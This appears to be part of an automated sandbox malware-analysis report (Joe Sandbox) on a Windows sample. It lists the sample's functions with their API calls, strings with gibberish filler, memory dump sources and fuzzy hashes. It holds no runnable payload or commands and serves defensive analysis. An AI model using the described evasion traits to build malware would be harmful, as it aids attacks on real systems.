                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                      • Opcode ID: 26e3a55a9e4dd30213d406e29c9426c1734d57e9fea91615f583661b3791f6bb
                                                                                                                                                                                                      • Instruction ID: 629ae143b7aa868528a5526f7ca6918666db97de6fc411c1c75406f0552514c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26e3a55a9e4dd30213d406e29c9426c1734d57e9fea91615f583661b3791f6bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12210574802215DFD760DFA9ED896447BB0FB28301F11402BE80993772E7B5958EEF49
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040B5B4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000B572), ref: 0040B5B9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: f5944f7a497243d8d7952678e014602460eb12c086bcf5cb3cded92ddc3ac9f9
                                                                                                                                                                                                      • Instruction ID: 18890b57369581bd9b8984f8de6ce42cc9b09e7a1accd70baa0d4bcc8d65959d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5944f7a497243d8d7952678e014602460eb12c086bcf5cb3cded92ddc3ac9f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 029002A47E2180D6C60017716D1DA0525D4BA4974AB5104B57482E54A8DB754040995D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 023E90A3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 023E9000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_23e9000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: 821e11f1d3c7166bfabbd3c918b2b2d579bff6b3958ce7daeb8bc844f7247e09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9011A172340210AFDB54DF55DCC0FA673EAEB89320B198065ED09CB392E676EC46CB60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 025B0042 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679668945.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_25b0000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: 0ade95920a6298abbe7824189d35f298339e63a797c7e888f44060ed2e29a19d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39117C72340105AFEB54DE65DC90EF773EAFF88360B598165E908CB351D676E801CB60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041038B Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00402CE0,00000001,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,?), ref: 004103BD
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004103CF
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000100,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,?,?), ref: 0041045B
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00410494
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 004104C7
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 004104E3
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 0041051D
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00410556
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00410581
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 004105A4
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004105AE
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004105B7
                                                                                                                                                                                                      • ___ansicp.LIBCMT ref: 004105E8
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00410613
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,00000100,?,00000000,?,?,?,?), ref: 00410634
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041066C
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0041068E
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000100,?,00000000,?), ref: 004106A6
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 004106C4
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004106D9
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,00000100,?,00000000,?,?,?,?,?,?,?), ref: 004106F3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                      • String ID: GWh,@
                                                                                                                                                                                                      • API String ID: 3809854901-693176108
                                                                                                                                                                                                      • Opcode ID: d3258b5402916f26e598f24df6cabe2abcac44fe3bd0fc14fe973c13867e7e2f
                                                                                                                                                                                                      • Instruction ID: 1b2c51639e80d38376a8b417860281ffbc8200aa37427921f782e4f9ae46fa49
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3258b5402916f26e598f24df6cabe2abcac44fe3bd0fc14fe973c13867e7e2f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04B19072800119EFCF219F94CD808EF3BB6EB48354B14412BFA15A6260D7B98DE1DF99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00403E3F Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 134COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(cayetapufutida,?,?,00000055), ref: 00403E70
                                                                                                                                                                                                      • GlobalAddAtomA.KERNEL32(sugihetopovegonehaculayihimus), ref: 00403E7B
                                                                                                                                                                                                      • SearchPathA.KERNEL32(00000000,00000000,humuyoh,00000000,?,?,?,?,00000055), ref: 00403EF2
                                                                                                                                                                                                      • DebugActiveProcess.KERNEL32(00000000,?,?,00000055), ref: 00403EF9
                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00000055), ref: 00403F00
                                                                                                                                                                                                      • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?,?,?,00000055), ref: 00403F10
                                                                                                                                                                                                      • GetGeoInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F76
                                                                                                                                                                                                      • FindFirstVolumeMountPointA.KERNEL32(bexominayunaciyihogucutejefif kijafakesapazayavixukatezekiv zawetotacegopurisidutuhelirozi,?,00000000), ref: 00403FA0
                                                                                                                                                                                                      • GetVolumePathNameA.KERNEL32(rivujiherasanarocicewowupaja,?,00000000), ref: 00403FB3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PathVolume$ActiveAtomConsoleDebugDirectoryEnvironmentFindFirstFreeGlobalInfoInputMountNamePointProcessReadRemoveSearchStrings
                                                                                                                                                                                                      • String ID: $bexominayunaciyihogucutejefif kijafakesapazayavixukatezekiv zawetotacegopurisidutuhelirozi$cayetapufutida$humuyoh$rivujiherasanarocicewowupaja$sugihetopovegonehaculayihimus$@@
                                                                                                                                                                                                      • API String ID: 1075561957-1249441868
                                                                                                                                                                                                      • Opcode ID: b15e3fd470876a09fbd0562a18f0e10997856b1d698d20001b19ea0931017013
                                                                                                                                                                                                      • Instruction ID: 80d4ec71a02ddc7576705c1c4e3dd8bdc8be99f1f95b5e99e614b3f8bd6c3544
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b15e3fd470876a09fbd0562a18f0e10997856b1d698d20001b19ea0931017013
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC5104B1D01219EFDB10CFA4D988A9EBBB9FF48311F108166E505F7250D738AA45CF95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00403E45 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 131COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(cayetapufutida,?,?,00000055), ref: 00403E70
                                                                                                                                                                                                      • GlobalAddAtomA.KERNEL32(sugihetopovegonehaculayihimus), ref: 00403E7B
                                                                                                                                                                                                      • SearchPathA.KERNEL32(00000000,00000000,humuyoh,00000000,?,?,?,?,00000055), ref: 00403EF2
                                                                                                                                                                                                      • DebugActiveProcess.KERNEL32(00000000,?,?,00000055), ref: 00403EF9
                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00000055), ref: 00403F00
                                                                                                                                                                                                      • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?,?,?,00000055), ref: 00403F10
                                                                                                                                                                                                      • GetGeoInfoW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403F76
                                                                                                                                                                                                      • FindFirstVolumeMountPointA.KERNEL32(bexominayunaciyihogucutejefif kijafakesapazayavixukatezekiv zawetotacegopurisidutuhelirozi,?,00000000), ref: 00403FA0
                                                                                                                                                                                                      • GetVolumePathNameA.KERNEL32(rivujiherasanarocicewowupaja,?,00000000), ref: 00403FB3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PathVolume$ActiveAtomConsoleDebugDirectoryEnvironmentFindFirstFreeGlobalInfoInputMountNamePointProcessReadRemoveSearchStrings
                                                                                                                                                                                                      • String ID: $bexominayunaciyihogucutejefif kijafakesapazayavixukatezekiv zawetotacegopurisidutuhelirozi$cayetapufutida$humuyoh$rivujiherasanarocicewowupaja$sugihetopovegonehaculayihimus$@@
                                                                                                                                                                                                      • API String ID: 1075561957-1249441868
                                                                                                                                                                                                      • Opcode ID: de7613d92442acc92b606536f73ec0928528c305ca9532b5f22de2c36750cff2
                                                                                                                                                                                                      • Instruction ID: 2c296cb6ea46a7a1c4f6a704c5952f716e1cccc024c05e4f67b617e850c20392
                                                                                                                                                                                                      • Opcode Fuzzy Hash: de7613d92442acc92b606536f73ec0928528c305ca9532b5f22de2c36750cff2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC5104B1D01219EFCB10CFA8D988A9EBBB9FF48311F108166E505F7260D734AA45CFA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040A40C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,005D2440,0000000C,0040A547,00000000,00000000,?,?,00407D09,00407EC3,00000001,?,004051CE,00000001,?), ref: 0040A41E
                                                                                                                                                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 0040A429
                                                                                                                                                                                                        • Part of subcall function 00405C46: Sleep.KERNEL32(000003E8,?,?,0040A36F,KERNEL32.DLL,?,0040B55A,?,00407EBD,?,00000001,?,004051CE,00000001,?), ref: 00405C52
                                                                                                                                                                                                        • Part of subcall function 00405C46: GetModuleHandleW.KERNEL32(?,?,?,0040A36F,KERNEL32.DLL,?,0040B55A,?,00407EBD,?,00000001,?,004051CE,00000001,?), ref: 00405C5B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040A452
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040A462
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0040A484
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(005D48A8), ref: 0040A491
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0040A4A5
                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 0040A4C3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                      • API String ID: 1028249917-2843748187
                                                                                                                                                                                                      • Opcode ID: e86fb24cb9984c5e3ad45e89a45aad65dbaada85dd109eae8daefd4383258a7b
                                                                                                                                                                                                      • Instruction ID: 731ddda71b638b6d238d1c5abd92134538ba9cf0231ef6d837f69a4577dd30e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e86fb24cb9984c5e3ad45e89a45aad65dbaada85dd109eae8daefd4383258a7b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D119071400701AED720AF7AD945B5ABBE0EF04318F10853FE499B62E1C7B899418F5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00406A2A Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 00406A52
                                                                                                                                                                                                        • Part of subcall function 00406576: __getptd.LIBCMT ref: 00406584
                                                                                                                                                                                                        • Part of subcall function 00406576: __getptd.LIBCMT ref: 00406592
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406A5C
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __getptd_noexit.LIBCMT ref: 0040A56F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __amsg_exit.LIBCMT ref: 0040A57C
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406A6A
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406A78
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406A83
                                                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 00406AA9
                                                                                                                                                                                                        • Part of subcall function 0040661B: __CallSettingFrame@12.LIBCMT ref: 00406667
                                                                                                                                                                                                        • Part of subcall function 00406B50: __getptd.LIBCMT ref: 00406B5F
                                                                                                                                                                                                        • Part of subcall function 00406B50: __getptd.LIBCMT ref: 00406B6D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                                                      • Opcode ID: d2d84dba7a44a06f4c045cbef42b05c61a63b69ccab390f936cd648beab31437
                                                                                                                                                                                                      • Instruction ID: 647e5d338d9a534ca623e653987177106001b77b2dc6cfc18af297a025cc89d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2d84dba7a44a06f4c045cbef42b05c61a63b69ccab390f936cd648beab31437
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B111D7B1C00309EFDB00EFA5D945AED7BB0FF04314F15806AF854A7291DB389A219F59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00409013 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                                                      • String ID: `Zh$pD]$F]
                                                                                                                                                                                                      • API String ID: 3494438863-1774951608
                                                                                                                                                                                                      • Opcode ID: a3e6ae2388779e7fdfb35b78dc22b485bae5f198c0273997e8d005b9bbf605cd
                                                                                                                                                                                                      • Instruction ID: 928507f16508146611fc0c5405454b627c74a4787e08ca63e15d666fe88487c9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3e6ae2388779e7fdfb35b78dc22b485bae5f198c0273997e8d005b9bbf605cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD11A33170461067E7388A2DBCD07A22686B784738F24433BE612EB3D1E738CC814788
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00406DD7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 00406DEA
                                                                                                                                                                                                        • Part of subcall function 00406D45: ___BuildCatchObjectHelper.LIBCMT ref: 00406D7B
                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00406E01
                                                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 00406E0F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                      • String ID: D#]$csm
                                                                                                                                                                                                      • API String ID: 2163707966-3072043196
                                                                                                                                                                                                      • Opcode ID: 2d611d18984dedf267cdb7ef4b8752393003a5e34e3fe70bd9b60e366d216b3b
                                                                                                                                                                                                      • Instruction ID: 165d52aaeefbcc74b1478282deb1627571c172dca2d1b97a2d28139701869b90
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d611d18984dedf267cdb7ef4b8752393003a5e34e3fe70bd9b60e366d216b3b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE014B7510010ABBDF126F52CC41EEB3F6AEF04354F11802AFD19251A0DB3A99B1EBA8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040E9A1 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0040E9AD
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __getptd_noexit.LIBCMT ref: 0040A56F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __amsg_exit.LIBCMT ref: 0040A57C
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0040E9CD
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0040E9DD
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0040E9FA
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(023D1660), ref: 0040EA25
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4271482742-0
